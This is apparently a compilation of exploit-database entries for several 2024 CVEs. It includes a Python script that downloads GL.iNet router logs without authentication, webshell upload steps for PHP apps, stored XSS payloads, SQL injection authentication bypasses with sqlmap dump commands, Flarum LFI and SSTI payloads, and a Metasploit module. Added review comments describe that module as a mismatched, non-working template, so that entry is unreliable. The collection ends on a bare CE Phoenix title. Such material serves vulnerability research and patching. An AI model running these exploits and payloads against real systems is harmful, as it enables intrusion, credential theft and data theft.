-
GL-iNet MT6000 4.5.5 - Arbitrary File Download
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
#
# NOTE(review): this listing was collapsed onto a single line; the indentation
# below is reconstructed. Where a statement's nesting was ambiguous, the
# placement that yields the same control flow either way was chosen.

import sys
import requests
import json  # unused: the code calls the Response.json() method, never this module

# TLS verification is disabled on every request below (verify=False); this
# call only silences the InsecureRequestWarning that would otherwise be printed.
requests.packages.urllib3.disable_warnings()

# Headers sent with every request. The User-Agent value is a constant, so it is
# a straightforward log-side indicator for traffic generated by this script.
h: dict[str, str] = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}


def DoesTarExist() -> bool:
    """Fetch ``<url>/js/logread.tar`` and save it as ``./logread.tar``.

    Reads the module-level ``url`` and ``h``. Returns True when the device
    answered 200 and the body was written; False on any other status code.
    The request carries no session token or cookie -- the unauthenticated
    download the header describes -- so the request path itself is the
    natural thing to alert on in the device's web-server logs.
    """
    r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
    if r.status_code == 200:
        # Written without a context manager: if write() raises, the handle is
        # not closed. Left as in the original.
        f = open("logread.tar", "wb")
        f.write(r.content)
        f.close()
        print("[*] Full logs archive `logread.tar` has been downloaded!")
        print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
        return True
    else:
        print("[*] The `logread.tar` archive does not exist however ... try again later!")
        return False


def isVulnerable() -> bool:
    """Fingerprint the target as a GL.iNet device running 4.x firmware.

    Three unauthenticated probes against the module-level ``url``: an empty
    POST to ``/rpc`` that is expected to yield an nginx 500, a GET of the
    login bundle that is expected to contain ``"Admin-Token"``, and a JSON-RPC
    ``call`` with params ``["", "ui", "check_initialized"]`` whose ``result``
    is read for ``firmware_version`` and ``model``. Returns True only when the
    reported version starts with ``"4."``; otherwise prints a message and
    returns False.

    Raises ``KeyError``/``ValueError`` (uncaught here and in ``__main__``) if
    the third response is not JSON or lacks the expected ``result`` keys;
    exceptions from ``requests`` are not handled either.
    """
    r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
    if r1.status_code == 500 and "nginx" in r1.text:
        r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
        if "Admin-Token" in r2.text:
            # The first params element is an empty string -- presumably an
            # empty session id, i.e. this lookup needs no login; confirm
            # against the vendor advisory linked in the header.
            j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
            r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
            # The body is parsed twice; redundant but harmless.
            ver = r3.json()['result']['firmware_version']
            model = r3.json()['result']['model']
            # ('4.') is a plain str, not a 1-tuple, so this is a single-prefix
            # check; startswith() accepts either form.
            if ver.startswith(('4.')):
                print("[*] Firmware version (%s) is vulnerable!" %ver)
                print("[*] Device model is: %s" %model)
                return True
    # Reached when any of the three probes above did not match.
    print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
    return False


def isAlive() -> bool:
    """Return True when a GET of the module-level ``url`` answers 200.

    Any other status prints a hint and returns False. Every exception raised
    by ``requests`` (connection refused, timeout, TLS failure, ...) is caught
    by the broad ``except Exception``, reported, and turned into False.
    """
    try:
        r = requests.get(url, verify=False, timeout=30, headers=h)
        if r.status_code != 200:
            print("[*] Make sure the target's web interface is accessible!")
            return False
        elif r.status_code == 200:  # always true once the branch above is skipped
            print("[*] The target is reachable!")
            return True
    except Exception:
        print("[*] Error occurred when connecting to the target!")
        pass  # redundant: the except body already ends after the print
    # Only reached on the exception path; both branches above return.
    return False


if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("exploit.py url")
        sys.exit(0)  # exits with status 0 even on a usage error
    # ``url`` is a module global read by the three helpers above.
    url = sys.argv[1]
    url = url.lower()  # lowercases the whole URL, path included, not just scheme/host
    if not url.startswith(('http://', 'https://')):
        print("[*] Invalid url format! It should be http[s]://<domain or ip>")
        sys.exit(0)
    if url.endswith("/"):
        url = url.rstrip("/")
    print("[*] GL.iNet Unauthenticated Full Logs Downloader")
    try:
        # ``(True and True)`` is just ``True``, so this compares the
        # short-circuit ``and`` result with True: isVulnerable() runs only if
        # isAlive() passed, and the download is attempted only if both passed.
        if (isAlive() and isVulnerable()) == (True and True):
            DoesTarExist()
    except KeyboardInterrupt:
        print("[*] The exploit has been stopped by the user!")
        sys.exit(0)
-
Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) # Date: 02/04/2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 # CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Go to: http://127.0.0.1/fuelflow/index.php 2. Log in with the default [email protected] and Password=admin 3. Go to "http://127.0.0.1/fuelflow/admin/web.php" 4. Upload the san.php file in the "Image" field 5. The phpinfo output will be present on the "http://localhost/fuelflow/assets/images/phpinfo.php" page 6. The content of the san.php file is given below: <?php phpinfo();?> # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md
-
E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: E-INSUARANCE v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: v1.0 # Tested on: Windows 10 # Description: Stored Cross Site Scripting vulnerability in E-INSUARANCE - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the Firstname and lastname parameters in the profile component. # POC: 1. After login, go to http://127.0.0.1/E-Insurance/Script/admin/?page=profile 2. In the fname & lname parameters add the payload "><script>alert("Hacked_by_Sandy")</script> 3. Click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29411.md
-
Hospital Management System v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: Hospital Management System v1.0 - Stored Cross Site Scripting (XSS) # Google Dork: NA # Date: 28-03-2024 # Exploit Author: Sandeep Vishwakarma # Vendor Homepage: https://code-projects.org # Software Link: https://code-projects.org/hospital-management-system-in-php-css-javascript-and-mysql-free-download/ # Version: v1.0 # Tested on: Windows 10 # CVE : CVE-2024-29412 # Description: Stored Cross Site Scripting vulnerability in Hospital Management System - v1.0 allows an attacker to execute arbitrary code via a crafted payload to the 'patient_id', 'first_name', 'middle_initial', 'last_name' parameters in the /receptionist.php component. # POC: 1. Go to the User Login page: http://localhost/HospitalManagementSystem-gh-pages/ 2. Login with the "r1" ID, which redirects to the "http://localhost/HospitalManagementSystem-gh-pages/receptionist.php" endpoint. 3. In the Patient information functionality add this payload "><script>alert('1')</script> in all parameters. 4. Click on submit. # Reference: https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29412.md
-
Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
#############################################
# Exploit Title : Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################
#
# NOTE(review): the listing was collapsed onto one line; the indentation below
# is reconstructed. More importantly, the module does not match its own header:
# the title names a kernel privilege escalation, but the class subclasses
# Msf::Exploit::Remote, speaks DCERPC to RHOST:RPORT, and describes itself as
# targeting "FooBar version 1.0" with Author "You". The mixin
# Msf::Exploit::Remote::DCERPC::MS08_067::Artifact and the helper
# impacket_artifact are not Metasploit APIs I can confirm exist, and
# datastore['FooBarPayload'] is read in #exploit but never registered in
# #initialize. Read this as an unfilled template rather than a working module;
# the CVE reference is the only part of it tied to the title.

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact

  # Module metadata and options. Only RHOST and RPORT are registered, both with
  # placeholder defaults (127.0.0.1:1234).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end

  # Connects, calls impacket_artifact once, and maps a Meterpreter
  # RequestError to CheckCode::Safe and anything else to CheckCode::Appears.
  # Rescuing a Meterpreter exception around a DCERPC call looks copied from
  # elsewhere; nothing here inspects the target's build number from the title.
  def check
    connect
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Appears
  end

  # Same call with a third argument read from a datastore key that is never
  # registered (so nil unless set manually), then handler/disconnect. A
  # RequestError becomes Failure::UnexpectedReply.
  def exploit
    connect
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
    handler
    disconnect
  end
end

# reference : https://nvd.nist.gov/vuln/detail/CVE-2024-21338
-
FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI)
Exploit Title: FoF Pretty Mail 1.1.2 - Local File Inclusion (LFI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Local File Inclusion (LFI) due to the unsafe handling of file paths in the email template. An attacker with administrative access can exploit this vulnerability to include sensitive files from the server's file system in the email content, potentially leading to information disclosure. Steps to Reproduce: Log in as an administrator on the Flarum forum. Navigate to the FoF Pretty Mail extension settings. Edit the email default template and insert the following payload at the end of the template: {{ include('/etc/passwd') }} Save the changes to the email template. Trigger any action that sends an email, such as user registration or password reset. The recipient of the email will see the contents of the included file (in this case, /etc/passwd) in the email content.
-
FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI)
Exploit Title: FoF Pretty Mail 1.1.2 - Server Side Template Injection (SSTI) Date: 03/28/2024 Exploit Author: Chokri Hammedi Vendor Homepage: https://flarum.org/ Software Link: https://github.com/FriendsOfFlarum/pretty-mail Version: 1.1.2 Tested on: Windows XP CVE: N/A Description: The FoF Pretty Mail extension for Flarum is vulnerable to Server-Side Template Injection (SSTI) due to the unsafe handling of template variables. An attacker with administrative access can inject malicious code into the email template, leading to arbitrary code execution on the server. Steps to Reproduce: - Log in as an administrator on the Flarum forum. - Navigate to the FoF Pretty Mail extension settings. - Edit the email default template and insert the following payload: {{ 7*7 }} {{ system('id') }} {{ system('echo "Take The Rose"') }} - Save the changes to the email template. - Trigger any action that sends an email, such as user registration or password reset. - The recipient of the email will see the result of the injected expressions (e.g., "49" for {{ 7*7 }}, the output of the id command for {{ system('id') }}, and the output of the echo "Take The Rose" command for {{ system('echo"Take The Rose"') }}) in the email content.
-
LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-1-19 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.lepton-cms.com/ # Version : 7.0.0 1 ) Login with admin credentials > https://127.0.0.1/LEPTON/backend/login/index.php 2 ) Go to the Languages page > https://127.0.0.1/LEPTON/backend/languages/index.php 3 ) Upload the upgrade.php file on the Languages page > <?php echo system('id'); ?> 4 ) After clicking install you will see the result # Result : uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)
-
Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24499 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/edit_profile.php > Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.   ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. 
## Proof of Concept: ### SQLMap Save the following request to `edit_profile.txt`: ``` POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 88 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/edit_profile.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
-
Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security. ### Affected Components: > add-tracker.php, update-tracker.php Vulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat ### Description: > Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page. ## Proof of Concept: The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability. 
Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 175 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ```  ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
-
Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24497 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > /employee_akpoly/Admin/login.php > Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.   ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `' and 1=1-- -` can be used to bypass authentication within admin login page. 
``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 61 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin= ``` ### SQLMap Save the following request to `admin_login.txt`: ``` POST /employee_akpoly/Admin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 62 Origin: http://localhost Connection: close Referer: http://localhost/employee_akpoly/Admin/login.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 txtusername=admin&txtpassword=password&btnlogin= ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump ``` ## Recommendations When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
-
Daily Habit Tracker 1.0 - SQL Injection
# Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. 
## Proof of Concept: ### Manual Exploitation The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ```  ### SQLMap Save the following request to `delete_tracker.txt`: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
-
Daily Habit Tracker 1.0 - Broken Access Control
# Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-tracker.php, delete-tracker.php, update-tracker.php ### Description: > Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials. ## Proof of Concept: ### Unauthenticated Access to Home page > To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page. 
### Create Tracker as Unauthenticated User To create a tracker, use the following request: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ### Update Tracker as Unauthenticated User To update a tracker, use the following request: ``` POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes ``` ### Delete Tracker as Unauthenticated User: To delete a tracker, use the following request: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.
-
Elementor Website Builder < 3.12.2 - Admin+ SQLi
#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi #References #CVE : CVE-2023-0329 #E1.Coders #Open Burp Suite. #In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080. #Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080. #Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page. #On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": #code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);# #Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request. #Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward". #The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. A delay of roughly this length is the indicator of successful (time-based) SQL injection. #Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin. # #References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/ #Exploit Python : #The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: #This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection. #Please make sure you have set up your Burp Suite environment correctly. 
Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payload url = "http://localhost:8080/wp-admin/admin-ajax.php" data = { "action": "elementor_ajax_save_builder", "editor_post_id": "1", "post_id": "1", "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#" } # Send the request to the target URL response = requests.post(url, data=data) # Check if the response indicates a successful SQL injection if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text: print("SQL Injection successful!") else: print("SQL Injection failed.")
-
Blood Bank v1.0 - Stored Cross Site Scripting (XSS)
# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises from insufficient input validation and sanitization of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters; once stored on the server, the scripts may be executed when other users view the affected user's profile. Vulnerable File: updateprofile.php Parameters: rename, remail, rphone, rcity # Proof of Concept: ---------------------- 1. Intercept the POST request to updateprofile.php via Burp Suite 2. Inject the payload into the vulnerable parameters 3. Payload: "><svg/onload=alert(document.domain)> 4. 
Example request for rname parameter: --- POST /bloodbank/file/updateprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/rprofile.php?id=1 Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update ---- 5. Go to the profile page and trigger the XSS XSS Payload: "><svg/onload=alert(document.domain)>
-
CE Phoenix v1.0.8.20 - Remote Code Execution
